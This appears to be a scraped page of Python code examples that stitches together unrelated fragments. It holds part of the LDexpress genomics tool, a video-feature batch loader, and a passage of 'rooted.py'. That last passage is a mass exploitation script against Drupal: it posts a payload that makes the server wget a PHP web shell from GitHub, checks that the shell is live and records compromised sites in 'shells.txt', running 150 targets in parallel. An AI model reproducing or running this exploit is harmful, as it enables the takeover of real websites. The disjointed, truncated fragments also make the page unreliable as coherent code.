        if (len(snp_i) > 0 and len(snp_i[0]) > 2):
            if (snp_i[0][0:2] == "rs"
                    or snp_i[0][0:3] == "chr") and snp_i[0][-1].isdigit():
                # query variant to get genomic coordinates in dbsnp
                snp_coord = get_coords(db, snp_i[0])
                if snp_coord != None and snp_coord[
                        genome_build_vars[genome_build]['position']] != "NA":
                    # check if variant is on chrY for genome build = GRCh38
                    if snp_coord['chromosome'] == "Y" and (
                            genome_build == "grch38"
                            or genome_build == "grch38_high_coverage"):
                        if "warning" in errors_warnings:
                            errors_warnings["warning"] = errors_warnings["warning"] + \
                                ". " + "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord['id'] + " = chr" + snp_coord['chromosome'] + ":" + snp_coord[genome_build_vars[genome_build]['position']] + ")"
                        else:
                            errors_warnings[
                                "warning"] = "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord[
                                    'id'] + " = chr" + snp_coord[
                                        'chromosome'] + ":" + snp_coord[
                                            genome_build_vars[genome_build]
                                            ['position']] + ")"
                        warn.append(snp_i[0])
                    else:
                        rs_nums.append(snp_i[0])
                        snp_pos.append(snp_coord[
                            genome_build_vars[genome_build]['position']])
                        temp = [
                            snp_i[0],
                            str(snp_coord['chromosome']),
                            int(snp_coord[genome_build_vars[genome_build]
                                          ['position']])
                        ]
                        snp_coords.append(temp)
                else:
                    # Generate warning if query variant is not found in dbsnp
                    warn.append(snp_i[0])
                    queryWarnings.append([
                        snp_i[0], "NA", "Variant not found in dbSNP" +
                        dbsnp_version + ", variant removed."
                    ])
            else:
                # Generate warning if query variant is not a genomic position or rs number
                warn.append(snp_i[0])
                queryWarnings.append(
                    [snp_i[0], "NA", "Not a valid SNP, variant removed."])
        else:
            # Generate error for empty query variant
            errors_warnings["error"] = "Input list of RS numbers is empty"
            subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                            shell=True)
            return ("", "", "", "", "", errors_warnings)

    # Generate warnings for query variants not found in dbsnp
    if warn != []:
        if "warning" in errors_warnings:
            errors_warnings["warning"] = errors_warnings["warning"] + \
                ". The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(warn)
        else:
            errors_warnings[
                "warning"] = "The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(
                    warn)

    # Generate errors if no query variants are valid in dbsnp
    if len(rs_nums) == 0:
        errors_warnings[
            "error"] = "Input SNP list does not contain any valid RS numbers or coordinates. " + errors_warnings[
                "warning"]
        subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt",
                        shell=True)
        return ("", "", "", "", "", errors_warnings)

    thinned_snps = []

    print("##### FIND GWAS VARIANTS IN WINDOW #####")
    # establish low/high window for each query snp
    # ex: window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total
    combined_matched_snps = []
    for snp_coord in snp_coords:
        find_window_ld_start = timer()

        (geno,
         queryVariantWarnings) = get_query_variant(snp_coord, pop_ids,
                                                   str(request), genome_build)
        # print("geno", geno)
        # print("queryVariantWarnings", queryVariantWarnings)
        if (len(queryVariantWarnings) > 0):
            queryWarnings += queryVariantWarnings
        if (geno is not None):
            ###### SPLIT TASK UP INTO # PARALLEL SUBPROCESSES ######

            # find query window snps via tabix, calculate LD and apply R2/D' thresholds
            windowChunkRanges = chunkWindow(snp_coord[2], window,
                                            num_subprocesses)

            ld_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getWindowVariantsArgs = " ".join([
                    str(web),
                    str(snp_coord[0]),
                    str(snp_coord[1]),
                    str(windowChunkRanges[subprocess_id][0]),
                    str(windowChunkRanges[subprocess_id][1]),
                    str(request),
                    str(subprocess_id),
                    str(r2_d),
                    str(r2_d_threshold),
                    str(genome_build)
                ])
                # print("getWindowVariantsArgs", getWindowVariantsArgs)
                ld_subprocess_commands.append("python3 LDexpress_ld_sub.py " +
                                              getWindowVariantsArgs)

            ld_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in ld_subprocess_commands
            ]
            # collect output in parallel
            pool = Pool(len(ld_subprocesses))
            windowLDSubsets = pool.map(get_output, ld_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled ld window results
            windowLDSubsetsFlat = [
                val.decode('utf-8').strip().split("\t")
                for sublist in windowLDSubsets for val in sublist
            ]
            # print("windowLDSubsetsFlat length", len(windowLDSubsetsFlat))

            find_window_ld_end = timer()
            # print("FIND WINDOW SNPS AND CALCULATE LD TIME ELAPSED:", str(find_window_ld_end - find_window_ld_start) + "(s)")

            # find gtex tissues for window snps via mongodb, apply p-value threshold

            query_window_tissues_start = timer()

            windowLDSubsetsChunks = np.array_split(windowLDSubsetsFlat,
                                                   num_subprocesses)

            for subprocess_id in range(num_subprocesses):
                with open(
                        tmp_dir + 'express_ld_' + str(subprocess_id) + '_' +
                        str(request) + '.txt', 'w') as snpsLDFile:
                    for snp_ld_data in windowLDSubsetsChunks[
                            subprocess_id].tolist():
                        snpsLDFile.write("\t".join(snp_ld_data) + "\n")

            tissues_subprocess_commands = []
            for subprocess_id in range(num_subprocesses):
                getTissuesArgs = " ".join([
                    str(web),
                    str(request),
                    str(subprocess_id),
                    str(p_threshold),
                    str(tissues),
                    str(genome_build)
                ])
                tissues_subprocess_commands.append(
                    "python3 LDexpress_tissues_sub.py " + getTissuesArgs)

            tissues_subprocesses = [
                subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
                for command in tissues_subprocess_commands
            ]

            # getTissuesArgs = []
            # for subprocess_id in range(num_subprocesses):
            #     getTissuesArgs.append([windowLDSubsetsChunks[subprocess_id].tolist(), subprocess_id, p_threshold, tissue_ids, web])
            # with Pool(processes=num_subprocesses) as pool:
            #     tissueResultsSubsets = pool.map(get_tissues_sub, getTissuesArgs)

            # collect output in parallel
            pool = Pool(len(tissues_subprocesses))
            tissueResultsSubsets = pool.map(get_output, tissues_subprocesses)
            pool.close()
            pool.join()

            # flatten pooled tissues results
            matched_snps = [
                val.decode('utf-8').strip().split("\t")
                for sublist in tissueResultsSubsets for val in sublist
            ]

            # print("FINAL # RESULTS FOR", snp_coord[0], len(matched_snps))
            if (len(matched_snps) > 0):
                # details[snp_coord[0]] = {
                # details["results"] = {
                #     "aaData": matched_snps
                # }
                combined_matched_snps += matched_snps
                # add snp to thinned_snps
                thinned_snps.append(snp_coord[0])
            else:
                queryWarnings.append([
                    snp_coord[0],
                    "chr" + str(snp_coord[1]) + ":" + str(snp_coord[2]),
                    "No entries in GTEx are identified using the LDexpress search criteria."
                ])

            query_window_tissues_end = timer()
            print(
                "QUERY WINDOW TISSUES TIME ELAPSED:",
                str(query_window_tissues_end - query_window_tissues_start) +
                "(s)")
        # clean up tmp files generated by each query snp
        subprocess.call("rm " + tmp_dir + "*" + request + "*.vcf", shell=True)
        subprocess.call("rm " + tmp_dir + "express_ld_*_" + str(request) +
                        ".txt",
                        shell=True)

    # add full results
    details["results"] = {"aaData": combined_matched_snps}

    # find unique thinned genes and tissues
    thinned_genes = sorted(
        list(set(list(map(lambda row: row[5], combined_matched_snps)))))
    thinned_tissues = sorted(
        list(set(list(map(lambda row: row[7], combined_matched_snps)))))

    # # clean up tmp file(s) generated by each calculation
    subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True)

    details["queryWarnings"] = {"aaData": queryWarnings}

    # Check if thinned list is empty, if it is, display error
    if len(thinned_snps) < 1:
        errors_warnings[
            "error"] = "No entries in GTEx are identified using the LDexpress search criteria."
        return ("", "", "", "", "", errors_warnings)

    full_end = timer()
    print("TIME ELAPSED:", str(full_end - full_start) + "(s)")
    print("##### LDEXPRESS COMPLETE #####")

    return (sanitized_query_snps, thinned_snps, thinned_genes, thinned_tissues,
            details, errors_warnings)
コード例 #59
0
class AsyncVideoFeaturesLoaderBreakfast():
    """
    Load features for the video frames.
    """
    def __init__(self,
                 feats_path,
                 target,
                 n_frames_per_video,
                 batch_size,
                 n_feat_maps,
                 feat_map_side_dim,
                 n_threads=10):
        random.seed(101)
        np.random.seed(101)

        self.__feats_pathes = feats_path
        self.__n_frames_per_video = n_frames_per_video
        self.__n_feat_maps = n_feat_maps
        self.__feat_map_side_dim = feat_map_side_dim

        self.__batch_size = batch_size
        self.__y = target

        self.__is_busy = False
        self.__batch_features = None
        self.__batch_y = None
        self.__n_threads_in_pool = n_threads
        self.__pool = Pool(self.__n_threads_in_pool)

    def load_feats_in_batch(self, batch_number):
        self.__is_busy = True

        idx_batch = batch_number - 1
        start_idx = idx_batch * self.__batch_size
        stop_idx = (idx_batch + 1) * self.__batch_size

        batch_feat_pathes = self.__feats_pathes[start_idx:stop_idx]
        batch_y = self.__y[start_idx:stop_idx]

        n_batch_feats = len(batch_feat_pathes)
        n_batch_y = len(batch_y)
        idxces = range(0, n_batch_feats)

        assert n_batch_feats == n_batch_y

        # parameters passed to the reading function
        params = [data_item for data_item in zip(idxces, batch_feat_pathes)]

        # set list of batch features before start reading
        batch_feats_shape = (n_batch_feats, self.__n_frames_per_video,
                             self.__feat_map_side_dim,
                             self.__feat_map_side_dim, self.__n_feat_maps)

        self.__batch_features = np.zeros(batch_feats_shape, dtype=np.float32)
        self.__batch_y = batch_y

        # start pool of threads
        self.__pool.map_async(self.__load_features,
                              params,
                              callback=self.__thread_pool_callback)

    def get_batch_data(self):
        if self.__is_busy:
            raise Exception(
                'Sorry, you can\'t get features while threads are running!')
        else:
            return (self.__batch_features, self.__batch_y)

    def get_y(self):
        return self.__y

    def is_busy(self):
        return self.__is_busy

    def __thread_pool_callback(self, args):
        self.__is_busy = False

    def __load_features(self, params):

        idx_video = params[0]
        feats_path = params[1]
        video_name = feats_path.split('/')[-1]

        try:
            # load feature from file
            feats = utils.pkl_load(feats_path)

            n_feats = len(feats)
            assert n_feats == self.__n_frames_per_video, 'Sorry, wrong number of frames, expected: %d, got: %d' % (
                self.__n_frames_per_video, n_feats)
            self.__batch_features[idx_video] = feats

        except Exception as exp:
            print('\nSorry, error in loading feature %s' % (feats_path))
            print(exp)

    def shuffle_data(self):
        """
        shuffle these data: self.__feats_pathes, self.__class_names, self.__y
        :return:
        """

        n_samples = len(self.__feats_pathes)

        idx = range(n_samples)
        np.random.shuffle(idx)
        self.__feats_pathes = self.__feats_pathes[idx]
        self.__y = self.__y[idx]

    def close(self):
        self.__pool.close()
        self.__pool.terminate()
コード例 #60
0
ファイル: rooted.py プロジェクト: Joy-Majumdar/rooted
    'markup',
    'mail[#markup]':
    'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'
}
headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
}


def run(u):
    try:
        url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        r = requests.post(url, data=payload, verify=False, headers=headers)
        if 'Select Your File :' in requests.get(u + '/payload.php',
                                                verify=False,
                                                headers=headers).text:
            print(u, '==> RCE')
            with open('shells.txt', mode='a') as d:
                d.write(u + '/payload.php\n')
        else:
            print(u, "==> Not Vuln")
    except:
        pass


mp = Pool(150)
mp.map(run, target)
mp.close()
mp.join()